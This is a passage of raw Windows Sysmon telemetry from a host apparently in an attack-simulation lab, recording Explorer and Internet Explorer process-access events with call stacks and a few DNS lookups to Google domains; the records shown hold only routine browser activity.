)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.444{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.428{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.428{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.678{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.647{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.647{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.647{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 22542200x800000000000000013646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:14.885{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.16.217.172.in-addr.arpa.0type: 12 fra16s08-in-f200.1e100.net;type: 12 fra16s08-in-f8.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.397{59A5CD1D-9410-6005-0E05-00000000A301}6584www.googletagmanager.com0type: 5 www-googletagmanager.l.google.com;::ffff:172.217.16.200;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 